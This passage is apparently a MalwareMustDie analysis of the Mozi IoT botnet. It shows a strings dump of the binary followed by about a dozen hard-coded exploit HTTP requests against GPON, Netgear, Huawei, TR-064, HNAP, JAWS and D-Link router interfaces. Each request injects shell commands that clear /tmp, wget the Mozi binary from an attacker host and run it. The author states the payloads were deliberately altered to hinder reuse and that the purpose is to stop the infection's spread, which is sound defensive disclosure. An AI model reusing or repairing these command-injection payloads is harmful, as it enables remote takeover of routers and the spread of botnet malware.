611. 0x0003632a Channel number out of range
612. 0x00036346 Level 2 not synchronized
613. 0x0003635f Level 3 halted
614. 0x0003636e Level 3 reset
615. 0x0003637c Link number out of range
616. 0x00036395 Protocol driver not attached
617. 0x000363b2 No CSI structure available
618. 0x000363cd Level 2 halted
619. 0x000363dc Invalid exchange
620. 0x000363ed Invalid request descriptor
621. 0x00036408 Exchange full
622. 0x00036416 No anode
623. 0x0003641f Invalid request code
624. 0x00036434 Invalid slot
625. 0x00036442 Bad font file format
626. 0x00036457 Device not a stream
627. 0x0003646b No data available
628. 0x0003647d Timer expired
629. 0x0003648b Out of streams resources
630. 0x000364a4 Machine is not on the network
631. 0x000364c2 Package not installed
632. 0x000364d8 Object is remote
633. 0x000364e9 Link has been severed
634. 0x000364ff Advertise error
635. 0x0003650f Srmount error
636. 0x0003651d Communication error on send
637. 0x00036539 Protocol error
638. 0x00036548 Multihop attempted
639. 0x0003655b RFS specific error
640. 0x0003656e Bad message
641. 0x0003657a Value too large for defined data type
642. 0x000365a0 Name not unique on network
643. 0x000365bb File descriptor in bad state
644. 0x000365d8 Remote address changed
645. 0x000365ef Can not access a needed shared library
646. 0x00036616 Accessing a corrupted shared library
647. 0x0003663b .lib section in a.out corrupted
648. 0x0003665b Attempting to link in too many shared libraries
649. 0x0003668b Cannot exec a shared library directly
650. 0x000366b1 Invalid or incomplete multibyte or wide character
651. 0x000366e3 Interrupted system call should be restarted
652. 0x0003670f Streams pipe error
653. 0x00036722 Too many users
654. 0x00036731 Socket operation on non-socket
655. 0x00036750 Destination address required
656. 0x0003676d Message too long
657. 0x0003677e Protocol wrong type for socket
658. 0x0003679d Protocol not available
659. 0x000367b4 Protocol not supported
660. 0x000367cb Socket type not supported
661. 0x000367e5 Operation not supported
662. 0x000367fd Protocol family not supported
663. 0x0003681b Address family not supported by protocol
664. 0x00036844 Address already in use
665. 0x0003685b Cannot assign requested address
666. 0x0003687b Network is down
667. 0x0003688b Network is unreachable
668. 0x000368a2 Network dropped connection on reset
669. 0x000368c6 Software caused connection abort
670. 0x000368e7 Connection reset by peer
671. 0x00036900 No buffer space available
672. 0x0003691a Transport endpoint is already connected
673. 0x00036942 Transport endpoint is not connected
674. 0x00036966 Cannot send after transport endpoint shutdown
675. 0x00036994 Too many references: cannot splice
676. 0x000369b7 Connection timed out
677. 0x000369cc Connection refused
678. 0x000369df Host is down
679. 0x000369ec No route to host
680. 0x000369fd Operation already in progress
681. 0x00036a1b Operation now in progress
682. 0x00036a35 Stale NFS file handle
683. 0x00036a4b Structure needs cleaning
684. 0x00036a64 Not a XENIX named type file
685. 0x00036a80 No XENIX semaphores available
686. 0x00036a9e Is a named type file
687. 0x00036ab3 Remote I/O error
688. 0x00036ac4 Disk quota exceeded
689. 0x00036ad8 No medium found
690. 0x00036ae8 Wrong medium type
691. 0x00036afa File locking deadlock error
692. 0x00036b64 0123456789abcdef
693. 0x00036bb0 %u.%u.%u.%u.in-addr.arpa
694. 0x00036bcc %x.%x.
695. 0x00036bd4 ip6.arpa
696. 0x00036e70 /dev/null
697. 0x0003728f \a\b\t\n\v\f\r
698. 0x000372c1  !#$%&`()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~
699. 0x00037534 hlLjztq
700. 0x00037548 npxXoudifFeEgGaACSncs[
701. 0x00037587 \n\n\n\n\n\n\n\n
702. 0x00037590 (nil)
703. 0x0003759b nfinity
704. 0x000375cf \b/etc/services
705. 0x000375ec /etc/resolv.conf
706. 0x00037600 /etc/config/resolv.conf
707. 0x00037618 nameserver
708. 0x00037624 domain
709. 0x0003762c search
710. 0x00037645 \ninfinity
711. 0x00037660 /etc/hosts
712. 0x0003766c /etc/config/hosts
713.  
714. (2) Attack method to infect vulnerabilities hard coded in Mozi:
715.  
716. 0x000008d8 POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1：8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m+-O＋->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
717.  
718.  
719. 0x000010ec POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m＋-O+->/tmp/gpon80;sh＋/tmp/gpon80&ipv=0
720.  
721. 0x00001902 POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort>＜NewInternalClient>cd /var/; wget http://%s:%d/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
722.  
723. 0x00002114 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf＋/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n
724.  
725.  
726. 0x0000313c POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)＜/NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
727.  
728.  
729. 0x00003950 POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAPーENV:Body></SOAP-ENV:Envelope>
730.  
731.  
732. 0x00004164 POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:5555\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`＜/NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
733.  
734.  
735. 0x00004978 POST /HNAP1/ HTTP/1.0\r\nHost: %s:80\r\nContent-Type: text/xml; charset="utf-8"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://%s:%d/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`\r\nContent-Length: 640\r\n\r\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP＜/PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n
736.  
737.  
738. 0x0000518c GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}htｔp://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n
739. 0x000059a0 GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: %s:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n
740.  
741.  
742. 0x000061b4 POST /soap.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: %s:49152\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body＞<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://%s:%d/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n
743.  
744.  
745. 0x000069c8 GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
746. 0x000071dc GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
747.  
748. ---
749. This information is shared to prevent more spread caused by this infection.
750. The offensive codes has been jinxed (modified) to avoid copy-paste recycling.
751. @unixfreaxjp - malwaremustdie.org